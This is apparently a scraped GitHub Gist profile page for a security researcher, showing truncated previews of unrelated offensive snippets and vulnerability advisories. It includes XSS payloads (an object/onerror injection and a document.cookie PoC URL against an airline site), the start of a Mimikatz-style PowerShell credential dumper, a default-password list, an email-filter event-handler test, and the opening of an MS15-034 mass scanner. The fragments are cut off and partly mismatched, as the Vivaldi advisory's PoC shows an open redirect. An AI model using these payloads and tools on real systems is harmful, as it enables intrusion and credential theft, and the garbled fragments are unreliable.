Superbug xsuperbug

  • Superbug
  • Turkey
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
<object/onerror=write`1`//
This file has been truncated, but you can view the full file.
function Invoke-Mimidogz
{
[CmdletBinding(DefaultParameterSetName="DumpCred")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
@xsuperbug
xsuperbug / passwords
Created June 5, 2015 21:36
passwords
admin
test
secret
guest
1234
123456
demo123
demo
password123
password1
xsuperbug / html_test.html
Created June 22, 2017 22:02 — forked from rwestergren/html_test.html
HTML Email Filter Test
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
Name : PIHOME RaspberryPi - Home Automation
Vendor Homepage : http://pihome.harkemedia.de/
Vulnerability Type : SQL Injection
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Details :
1- SQL Injection :
Source Code:
Name : United Airlines XSS Vulnerability
Vendor Homepage : http://www.united.com
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Example PoC is as follows :
http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=
----
xsuperbug / gist:7046b8b9e6ba56dd9acb
Created November 3, 2015 07:08
Active Content Blocking Bypass via Data URIs in Vivaldi Browser
Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser
Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable
Vendor Homepage : http://www.vivaldi.net
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Description
Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner. The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features.
Details
About the Vulnerability
=======================
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
Proof of concept
================
https://sso.tpo.com/members/edit?success_url=//google.com
Timeline
xsuperbug / gist:22d34affd4161001c209
Created April 16, 2015 09:04
MS15-034 mass scanner
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import random
import time
dosya = open("liste.txt","r")
ipAddress=[]
for i in dosya:
    ipAddr = i
hexAllFfff = "18446744073709551615"